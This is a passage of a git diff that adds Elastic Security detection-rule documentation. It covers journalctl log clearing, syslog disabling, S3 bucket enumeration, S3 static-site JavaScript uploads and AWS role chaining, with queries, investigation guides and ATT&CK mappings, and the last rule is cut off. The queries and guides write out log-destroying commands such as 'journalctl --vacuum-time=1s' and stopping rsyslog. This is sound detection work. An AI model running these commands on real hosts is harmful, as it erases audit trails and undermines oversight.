diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-attempt-to-clear-logs-via-journalctl.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-attempt-to-clear-logs-via-journalctl.asciidoc new file mode 100644 index 0000000000..f423248684 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-attempt-to-clear-logs-via-journalctl.asciidoc @@ -0,0 +1,165 @@ +[[prebuilt-rule-8-19-8-attempt-to-clear-logs-via-journalctl]] +=== Attempt to Clear Logs via Journalctl + +This rule monitors for attempts to clear logs using the "journalctl" command on Linux systems. Adversaries may use this technique to cover their tracks by deleting or truncating log files, making it harder for defenders to investigate their activities. The rule looks for the execution of "journalctl" with arguments that indicate log clearing actions, such as "--vacuum-time", "--vacuum-size", or "--vacuum-files". + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* endgame-* +* logs-auditd_manager.auditd-* +* logs-crowdstrike.fdr* +* logs-endpoint.events.process* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Data Source: Elastic Endgame +* Data Source: Auditd Manager +* Data Source: Crowdstrike +* Data Source: SentinelOne +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Attempt to Clear Logs via Journalctl* + + +This detection flags attempts to purge systemd journal logs by invoking journalctl with vacuum options, which attackers use to erase evidence and impede investigations. A common pattern is a compromised user escalating to root and immediately running sudo journalctl --vacuum-time=1s or --vacuum-size=1M, sometimes via a script or cron job, to rapidly truncate the journal across all boots and hide prior execution traces. + + +*Possible investigation steps* + + +- Enrich with user/UID, effective privileges, parent and command-line, session/TTY, and origin (SSH IP or local), and determine if execution came from a scheduled job (cron/systemd timer) or a script. +- Quantify destructiveness by extracting the exact vacuum parameter value(s) and immediately checking journal state (journalctl --disk-usage and --list-boots) and /var/log/journal size/mtime to see how much history was removed. +- Inspect configuration and persistence paths for intentional log suppression, including recent changes in /etc/systemd/journald.conf (Storage=volatile, SystemMaxUse, SystemMaxFileSize, MaxRetentionSec) and any new systemd units or scripts invoking journalctl vacuum. 
+- Correlate the vacuum timestamp with preceding activity to identify what might be concealed (privilege escalation, new accounts, sudoers edits, suspicious binaries), using auditd/EDR telemetry and shell history to rebuild the timeline. +- Verify remote log forwarding and SIEM ingestion for this host, compare gaps around the vacuum time, and recover pre-vacuum events from central storage to assess impact and intent. + + +*False positive analysis* + + +- A sysadmin or maintenance script ran journalctl --vacuum-time or --vacuum-size to reclaim space on a host under log disk pressure, which should correlate with low-free-space alerts, approved retention policy, and a scheduled systemd timer or cron job. +- OS provisioning or image-preparation steps vacuumed the journal with journalctl --vacuum-files to sanitize logs before snapshotting, typically a one-time root action occurring near installation and matching documented build procedures. + + +*Response and remediation* + + +- Immediately kill any active journalctl vacuum invocation (e.g., pkill -x journalctl), lock or remove sudo for the initiating user, and network-quarantine the host to prevent further tampering. +- Remove persistence by disabling systemd units/timers and cron jobs that call "journalctl --vacuum-*", inspecting /etc/systemd/system/* for ExecStart=journalctl vacuum and /etc/crontab, /etc/cron.*, and user crontabs, then deleting the offending scripts. +- Recover logging by setting Storage=persistent and policy-compliant SystemMaxUse/SystemMaxFileSize/MaxRetentionSec in /etc/systemd/journald.conf, restarting systemd-journald, and backfilling missing events from central log archives. +- Harden by enabling remote forwarding (ForwardToSyslog=yes and rsyslog/syslog-ng to SIEM), adding auditd rules to alert on "journalctl --vacuum-*", and tightening sudoers to require MFA and record command I/O for journalctl on critical hosts. +- Preserve evidence by archiving remaining /var/log/journal entries, journald.conf and its mtime, modified unit files under /etc/systemd/system, and shell/auth logs, and capture a disk snapshot before making further changes. +- Escalate to incident response if root executed "journalctl --vacuum-time/size/files" outside a documented maintenance window, if Storage=volatile was set or retention reduced below policy, or if the same actor performed vacuums on multiple hosts within 24 hours. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. 
Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event", "start", "ProcessRollup2", "executed", "process_started") and +process.name == "journalctl" and process.args like ("--vacuum-time=*", "--vacuum-size=*", "--vacuum-files=*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ +* Sub-technique: +** Name: Clear Linux or Mac System Logs +** ID: T1070.002 +** Reference URL: https://attack.mitre.org/techniques/T1070/002/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-attempt-to-disable-syslog-service.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-attempt-to-disable-syslog-service.asciidoc new file mode 100644 index 0000000000..5e568dd5f1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-attempt-to-disable-syslog-service.asciidoc @@ -0,0 +1,182 @@ +[[prebuilt-rule-8-19-8-attempt-to-disable-syslog-service]] +=== Attempt to Disable Syslog Service + +Adversaries may attempt to disable the syslog service in an attempt to disrupt event logging and evade detection by security controls.
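+
+As broader context for this detection, a KQL hunt along the following lines surfaces any `systemctl`, `service`, or `chkconfig` interaction with syslog-related services in the same process data. This is a loose sketch that will also match benign administration; the EQL rule query later in this document narrows matches to explicit stop and disable actions:
+
+[source, js]
+----------------------------------
+host.os.type : "linux" and process.name : ("systemctl" or "service" or "chkconfig") and
+  process.args : ("syslog" or "rsyslog" or "syslog-ng" or "syslog.service" or "rsyslog.service" or "syslog-ng.service")
+----------------------------------
+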
+ +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* endgame-* +* logs-crowdstrike.fdr* +* logs-endpoint.events.process* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/security-labs/detecting-log4j2-with-elastic-security + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend +* Data Source: Crowdstrike +* Data Source: SentinelOne +* Resources: Investigation Guide + +*Version*: 215 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Attempt to Disable Syslog Service* + + +Syslog is a critical component in Linux environments, responsible for logging system events and activities. Adversaries may target syslog to disable logging, thereby evading detection and obscuring their malicious actions. The detection rule identifies attempts to stop or disable syslog services by monitoring specific process actions and arguments, flagging suspicious commands that could indicate an attempt to impair logging defenses. + + +*Possible investigation steps* + + +- Review the process details to identify the user account associated with the command execution, focusing on the process.name and process.args fields to determine if the action was legitimate or suspicious. +- Check the system's recent login history and user activity to identify any unauthorized access attempts or anomalies around the time the syslog service was targeted. +- Investigate the parent process of the flagged command to understand the context of its execution and determine if it was initiated by a legitimate application or script. +- Examine other logs and alerts from the same host around the time of the event to identify any correlated suspicious activities or patterns that might indicate a broader attack. +- Assess the system for any signs of compromise, such as unexpected changes in configuration files, unauthorized software installations, or unusual network connections, to determine if the attempt to disable syslog is part of a larger attack. + + +*False positive analysis* + + +- Routine maintenance activities may trigger this rule, such as scheduled service restarts or system updates. To manage this, create exceptions for known maintenance windows or specific administrative accounts performing these tasks. +- Automated scripts or configuration management tools like Ansible or Puppet might stop or disable syslog services as part of their operations. Identify these scripts and whitelist their execution paths or associated user accounts. +- Testing environments often simulate service disruptions, including syslog, for resilience testing. Exclude these environments from the rule or adjust the rule to ignore specific test-related processes. +- Some legitimate software installations or updates may require stopping syslog services temporarily. 
Monitor installation logs and exclude these processes if they are verified as non-threatening. +- In environments with multiple syslog implementations, ensure that the rule is not overly broad by refining the process arguments to match only the specific syslog services in use. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent further malicious activity and potential lateral movement by the adversary. +- Terminate any suspicious processes identified in the alert, specifically those attempting to stop or disable syslog services, to restore normal logging functionality. +- Restart the syslog service on the affected system to ensure that logging is re-enabled and operational, using commands like `systemctl start syslog` or `service syslog start`. +- Conduct a thorough review of recent logs, if available, to identify any additional suspicious activities or indicators of compromise that may have occurred prior to the syslog service being disabled. +- Escalate the incident to the security operations team for further investigation and to determine if the attack is part of a larger campaign or if other systems are affected. +- Implement additional monitoring on the affected system and similar systems to detect any further attempts to disable logging services, using enhanced logging and alerting mechanisms. +- Review and update access controls and permissions to ensure that only authorized personnel have the ability to modify or stop critical services like syslog, reducing the risk of future incidents. + +==== Setup + + + +*Setup* + + +This rule requires data coming in from one of the following integrations: +- Elastic Defend +- Auditbeat + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". 
+- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +*Auditbeat Setup* + +Auditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations. + + +*The following steps should be executed in order to add the Auditbeat on a Linux System:* + +- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages. +- To install the APT and YUM repositories follow the setup instructions in this https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html[helper guide]. +- To run Auditbeat on Docker follow the setup instructions in the https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html[helper guide]. +- To run Auditbeat on Kubernetes follow the setup instructions in the https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html[helper guide]. +- For complete “Setup and Run Auditbeat” information refer to the https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event", "start", "ProcessRollup2") and + ( (process.name == "service" and process.args == "stop") or + (process.name == "chkconfig" and process.args == "off") or + (process.name == "systemctl" and process.args in ("disable", "stop", "kill")) + ) and process.args in ("syslog", "rsyslog", "syslog-ng", "syslog.service", "rsyslog.service", "syslog-ng.service") and +not ( + process.parent.name == "rsyslog-rotate" or + process.args == "HUP" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-aws-s3-bucket-enumeration-or-brute-force.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-aws-s3-bucket-enumeration-or-brute-force.asciidoc new file mode 100644 index 0000000000..b3d2e88c76 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-aws-s3-bucket-enumeration-or-brute-force.asciidoc @@ -0,0 +1,152 @@ +[[prebuilt-rule-8-19-8-aws-s3-bucket-enumeration-or-brute-force]] +=== AWS S3 Bucket Enumeration or Brute Force + +Identifies a high number of failed S3 operations against a single bucket from a single source address within a short timeframe. This activity can indicate attempts to collect bucket objects or cause an increase in billing to an account via internal "AccessDenied" errors. 
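+
+For orientation during triage, a KQL filter of roughly this shape returns the raw failing requests behind a spike so the caller identity and user agent can be reviewed; the bucket name and source address shown are placeholders, and the threshold rule query itself appears later in this document:
+
+[source, js]
+----------------------------------
+event.dataset : "aws.cloudtrail" and event.provider : "s3.amazonaws.com" and
+  aws.cloudtrail.error_code : "AccessDenied" and
+  tls.client.server_name : "<target-bucket>" and source.address : "<source-ip>"
+----------------------------------
+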
+ +*Rule type*: threshold + +*Rule indices*: + +* logs-aws.cloudtrail-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://medium.com/@maciej.pocwierz/how-an-empty-s3-bucket-can-make-your-aws-bill-explode-934a383cb8b1 +* https://docs.aws.amazon.com/AmazonS3/latest/userguide/ErrorCodeBilling.html + +*Tags*: + +* Domain: Cloud +* Data Source: AWS +* Data Source: Amazon Web Services +* Data Source: AWS S3 +* Resources: Investigation Guide +* Use Case: Log Auditing +* Tactic: Impact +* Tactic: Discovery +* Tactic: Collection + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating AWS S3 Bucket Enumeration or Brute Force* + + +This rule detects when many failed S3 operations (HTTP 403 AccessDenied) hit a single bucket from a single source address in a short window. This can indicate bucket name enumeration, object/key guessing, or brute-force style traffic intended to drive cost or probe for misconfigurations. 403 requests from outside the bucket owner’s account/organization are not billed, but 4XX from inside the owner’s account/org can still incur charges. Prioritize confirming who is making the calls and where they originate. + + +*Possible investigation steps* + + +- **Investigate in Timeline.** Investigate the alert in timeline (Take action -> Investigate in timeline) to retrieve and review all of the raw CloudTrail events that contributed to the threshold alert. Threshold alerts only display the grouped fields; Timeline provides a way to see individual event details such as request parameters, full error messages, and additional user context. +- **Confirm entity & target.** Note the rule’s threshold and window. Identify the target bucket (`tls.client.server_name`) and the source (`source.address`). Verify the caller identity details via any available `aws.cloudtrail.user_identity` fields. +- **Actor & session context.** In CloudTrail events, pivot 15–30 minutes around the spike for the same `source.address` or principal. Determine if the source is: + - **External** to your account/organization (recon/cost DDoS risk is lower for you due to 2024 billing change). + - **Internal** (same account/org)—higher cost risk and possible misuse of internal automation. +- **Bucket posture snapshot.** Record S3 Block Public Access, Bucket Policy, ACLs, and whether Versioning/Object Lock are enabled. Capture any recent `PutBucketPolicy`, `PutPublicAccessBlock`, `PutBucketVersioning`, or lifecycle changes. +- **Blast radius.** Check for similar spikes to other buckets/regions, or parallel spikes from the same source. Review any GuardDuty S3 findings and AWS Config drift related to the bucket or principal. +- **Business context.** Contact the bucket/app owner. Validate whether a migration, scanner, or broken job could legitimately cause bursts. + + +*False positive analysis* + + +- **Expected jobs / broken automation.** Data movers, posture scanners, or failed credentials can generate 403 storms. 
Validate with `userAgent`, ARNs, change windows, and environment (dev/stage vs prod). +- **External probing.** Internet-origin enumeration often looks like uniform 403s from transient or cloud-provider IPs and typically has no business impact and no billing if outside your account/org. Tune thresholds or allowlist known scanners if appropriate. + + +*Response and remediation* + + +**1. Immediate, low-risk actions** +- **Preserve evidence.** Export CloudTrail records (±30 minutes) for the bucket and source address into an evidence bucket with restricted access. +- **Notify owners.** Inform the bucket/application owner and security lead; confirm any maintenance windows. + +**2. Containment options** +- **External-origin spikes:** Verify Block Public Access is enforced and bucket policies are locked down. Optionally apply a temporary deny-all bucket policy allowing only IR/admin roles while scoping. +- **Internal-origin spikes:** Identify the principal. Rotate access keys for IAM users, or restrict involved roles (temporary deny/SCP, remove risky policies). Pause broken jobs/pipelines until validated. + +**3. Scope & hunting** +- Review Timeline and CloudTrail for related events: `PutBucketPolicy`, `PutPublicAccessBlock`, `PutBucketVersioning`, lifecycle changes, unusual `PutObject`/`DeleteObject` volumes, or cross-account access. +- Check GuardDuty S3 and Config drift findings for signs of tampering or lateral movement. + +**4. Recovery & hardening** +- If data impact suspected: with Versioning, restore known-good versions; otherwise, recover from backups/replicas. +- Enable Versioning on critical buckets going forward; evaluate Object Lock legal hold if enabled. +- Ensure Block Public Access, least-privilege IAM policies, CloudTrail data events for S3, and GuardDuty protections are consistently enforced. + + +*Additional information* + + +- https://docs.aws.amazon.com/AmazonS3/latest/userguide/ErrorCodeBilling.html[AWS S3 billing for error responses]: see latest AWS docs on which error codes are billed. +- https://aws.amazon.com/about-aws/whats-new/2024/05/amazon-s3-no-charge-http-error-codes/[AWS announcement (Aug 2024)]: 403s from outside the account/org are not billed. +- https://github.com/aws-samples/aws-incident-response-playbooks/[AWS IR Playbooks]: NIST-aligned template for evidence, containment, eradication, recovery, post-incident. +- https://github.com/aws-samples/aws-customer-playbook-framework/[AWS Customer Playbook Framework]: Practical response steps for account and bucket-level abuse. 
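+
+To support the scope-and-hunt guidance above, a KQL pivot of roughly this shape can be run in Timeline or Discover to surface recent bucket-posture changes recorded in CloudTrail; this is a sketch, and the action list can be extended (for example, with lifecycle operations) as needed:
+
+[source, js]
+----------------------------------
+event.dataset : "aws.cloudtrail" and event.provider : "s3.amazonaws.com" and
+  event.action : ("PutBucketPolicy" or "PutPublicAccessBlock" or "PutBucketVersioning")
+----------------------------------
+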
+ + +==== Rule query + + +[source, js] +---------------------------------- + event.dataset: "aws.cloudtrail" and + event.provider : "s3.amazonaws.com" and + aws.cloudtrail.error_code : "AccessDenied" and + tls.client.server_name : * + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Financial Theft +** ID: T1657 +** Reference URL: https://attack.mitre.org/techniques/T1657/ +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Cloud Storage Object Discovery +** ID: T1619 +** Reference URL: https://attack.mitre.org/techniques/T1619/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Cloud Storage +** ID: T1530 +** Reference URL: https://attack.mitre.org/techniques/T1530/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-aws-s3-static-site-javascript-file-uploaded.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-aws-s3-static-site-javascript-file-uploaded.asciidoc new file mode 100644 index 0000000000..4c9998d883 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-aws-s3-static-site-javascript-file-uploaded.asciidoc @@ -0,0 +1,151 @@ +[[prebuilt-rule-8-19-8-aws-s3-static-site-javascript-file-uploaded]] +=== AWS S3 Static Site JavaScript File Uploaded + +This rule detects when a JavaScript file is uploaded or accessed in an S3 static site directory (`static/js/`) by an IAM user or assumed role. This can indicate suspicious modification of web content hosted on S3, such as injecting malicious scripts into a static website frontend. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.sygnia.co/blog/sygnia-investigation-bybit-hack/ +* https://docs.aws.amazon.com/AmazonS3/latest/userguide/WebsiteHosting.html +* https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutObject.html + +*Tags*: + +* Domain: Cloud +* Data Source: AWS +* Data Source: Amazon Web Services +* Data Source: AWS S3 +* Tactic: Impact +* Use Case: Web Application Compromise +* Use Case: Cloud Threat Detection +* Resources: Investigation Guide + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating AWS S3 Static Site JavaScript File Uploaded* + + +An S3 `PutObject` action that targets a path like `static/js/` and uploads a `.js` file is a potential signal for web content modification. If done by an unexpected IAM user or outside of CI/CD workflows, it may indicate a compromise. + + +*Possible Investigation Steps* + + +- **Identify the Source User**: Check `aws.cloudtrail.user_identity.arn`, access key ID, and session type (`IAMUser`, `AssumedRole`, etc). +- **Review File Content**: Use the S3 `GetObject` or CloudTrail `requestParameters` to inspect the uploaded file for signs of obfuscation or injection. 
+- **Correlate to Other Events**: Review events from the same IAM user before and after the upload (e.g., `ListBuckets`, `GetCallerIdentity`, IAM activity). +- **Look for Multiple Uploads**: Attackers may attempt to upload several files or modify multiple directories. + + +*False Positive Analysis* + + +- This behavior may be expected during app deployments. Look at: + - The `user_agent.original` to detect legitimate CI tools (like Terraform or GitHub Actions). + - Timing patterns—does this match a regular release window? + - The origin IP and device identity. + + +*Response and Remediation* + + +- **Revert Malicious Code**: Replace the uploaded JS file with a clean version and invalidate CloudFront cache if applicable. +- **Revoke Access**: If compromise is confirmed, revoke the IAM credentials and disable the user. +- **Audit IAM Policies**: Ensure that only deployment users can modify static site buckets. +- **Enable Bucket Versioning**: This can allow for quick rollback and historical review. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-aws.cloudtrail* metadata _id, _version, _index + +| where + // S3 object read/write activity + event.dataset == "aws.cloudtrail" + and event.provider == "s3.amazonaws.com" + and event.action in ("GetObject", "PutObject") + + // IAM users or assumed roles only + and aws.cloudtrail.user_identity.type in ("IAMUser", "AssumedRole") + + // Requests for static site bundles + and aws.cloudtrail.request_parameters like "*static/js/*.js*" + + // Exclude IaC and automation tools + and not ( + user_agent.original like "*Terraform*" + or user_agent.original like "*Ansible*" + or user_agent.original like "*Pulumni*" + ) + +// Extract fields from request parameters +| dissect aws.cloudtrail.request_parameters + "%{{?bucket.name.key}=%{Esql.aws_cloudtrail_request_parameters_bucket_name}, %{?host.key}=%{Esql_priv.aws_cloudtrail_request_parameters_host}, %{?bucket.object.location.key}=%{Esql.aws_cloudtrail_request_parameters_bucket_object_location}}" + +// Extract file name portion from full object path +| dissect Esql.aws_cloudtrail_request_parameters_bucket_object_location "%{}static/js/%{Esql.aws_cloudtrail_request_parameters_object_key}" + +// Match on JavaScript files +| where ends_with(Esql.aws_cloudtrail_request_parameters_object_key, ".js") + +// Retain relevant ECS and dissected fields +| keep + aws.cloudtrail.user_identity.arn, + aws.cloudtrail.user_identity.access_key_id, + aws.cloudtrail.user_identity.type, + aws.cloudtrail.request_parameters, + Esql.aws_cloudtrail_request_parameters_bucket_name, + Esql.aws_cloudtrail_request_parameters_object_key, + user_agent.original, + source.ip, + event.action, + @timestamp + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Manipulation +** ID: T1565 +** Reference URL: https://attack.mitre.org/techniques/T1565/ +* Sub-technique: +** Name: Stored Data Manipulation +** ID: T1565.001 +** Reference URL: https://attack.mitre.org/techniques/T1565/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-aws-sts-role-chaining.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-aws-sts-role-chaining.asciidoc new file mode 100644 index 0000000000..e792541701 --- /dev/null +++ 
b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-aws-sts-role-chaining.asciidoc @@ -0,0 +1,159 @@ +[[prebuilt-rule-8-19-8-aws-sts-role-chaining]] +=== AWS STS Role Chaining + +Identifies role chaining activity. Role chaining is when you use one assumed role to assume a second role through the AWS CLI or API. While this is a recognized functionality in AWS, role chaining can be abused for privilege escalation if the subsequent assumed role provides additional privileges. Role chaining can also be used as a persistence mechanism as each AssumeRole action results in a refreshed session token with a 1-hour maximum duration. This is a new terms rule that looks for the first occurrence of one role (aws.cloudtrail.user_identity.session_context.session_issuer.arn) assuming another (aws.cloudtrail.resources.arn). + +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html#id_roles_terms-and-concepts +* https://www.uptycs.com/blog/detecting-anomalous-aws-sessions-temporary-credentials +* https://hackingthe.cloud/aws/post_exploitation/role-chain-juggling/ + +*Tags*: + +* Domain: Cloud +* Data Source: AWS +* Data Source: Amazon Web Services +* Data Source: AWS STS +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Privilege Escalation +* Tactic: Lateral Movement +* Resources: Investigation Guide + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating AWS STS Role Chaining* + + +Role chaining occurs when a role assumed with temporary credentials (`AssumeRole`) is used to assume another role. While supported by AWS, chaining can increase the risk of privilege escalation (if the second role grants broader permissions) and persistence (since each chained AssumeRole refreshes the session with up to a 1-hour duration). This new terms rule triggers on the first observed combination of one role (`aws.cloudtrail.user_identity.session_context.session_issuer.arn`) assuming another (`aws.cloudtrail.resources.arn`). + + +*Possible investigation steps* + + +- **Review Alert Context**: Investigate the alert, focusing on `aws.cloudtrail.user_identity.session_context.session_issuer.arn` (the calling role) and `aws.cloudtrail.resources.arn` (the target role). +- **Determine scope and intent.** Check `aws.cloudtrail.recipient_account_id` and `aws.cloudtrail.resources.account_id` fields to identify whether the chaining is Intra-account (within the same AWS account) or Cross-account (from another AWS account). +- **Check role privileges.** Compare policies of the calling and target roles. Determine if chaining increases permissions (for example, access to S3 data, IAM modifications, or admin privileges).
